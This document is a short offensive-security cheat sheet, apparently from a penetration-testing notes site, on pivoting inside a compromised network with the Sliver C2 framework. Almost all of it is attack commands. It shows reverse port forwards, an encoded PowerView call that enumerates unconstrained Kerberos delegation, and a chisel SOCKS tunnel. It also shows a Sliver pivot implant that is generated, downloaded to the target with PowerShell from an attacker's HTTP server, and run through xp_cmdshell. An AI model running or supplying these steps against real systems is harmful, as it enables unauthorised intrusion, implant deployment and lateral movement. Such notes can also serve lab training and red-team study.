Pivot
Kerberos Delegations
In case of need to bypass network restrictions we can add a reverse portforward.
rportfwd add -b 8080 -r 127.0.0.1:8080Then run Powerview to enum for unconstrained delegations
sharpsh -- '-u http://172.16.1.11:8080/PowerView.ps1 -e -c R2V0LU5ldENvbXB1dGVyIC1VbmNvbnN0cmFpbmVkCg=='Setting up chisel
Have a valid sessions running on sliver. The use the id from there to connect the ./sliver-client. For sliver client to run create a new operator in sliver new-operator -n mczen -l 10.10.14.120.
cd ~/sliver
sudo apt install mingw-w64
git clone https://github.com/MrAle98/chisel
cd chisel/
mkdir ~/.sliver-client/extensions/chisel
cp extension.json ~/.sliver-client/extensions/chisel/
make windowsdll_64
make windowsdll_32The start chisel server
# Set proxychains4.conf
sudo sh -c 'sed -i s/socks4/socks5/g /etc/proxychains4.conf && sed -i s/9050/1080/g /etc/proxychains4.conf'
# Start server
chisel server --reverse -v --socks5In ./chisel-client
# First make new profile
new-operator -n zen -l 10.10.14.133
# Import profile
./sliver-client_linux import /home/kali/sliver/mczen_10.10.14.120.cfg
# Use ID
use [ID of web01 session]
# Start chisel client from sliver-client
chisel client 10.10.14.120:8080 R:socksAdd reverse port forward
rportfwd add -b 8080 -r 127.0.0.1:8080Then create a pivot listener
# Start tcp
pivots tcp
# Generate and run tcp.exe on target
generate --tcp-pivot 172.16.84.20:9898 --skip-symbols -N tcp
# HTTP server
python3 -m http.server 5000
# Connect
powershell iwr -uri http://172.16.84.20:5000/tcp.exe -Outfile C:\Temp\tcp.exe
# Run .exe
xp_cmdshell C:\Temp\tcp.exe Last updated
Was this helpful?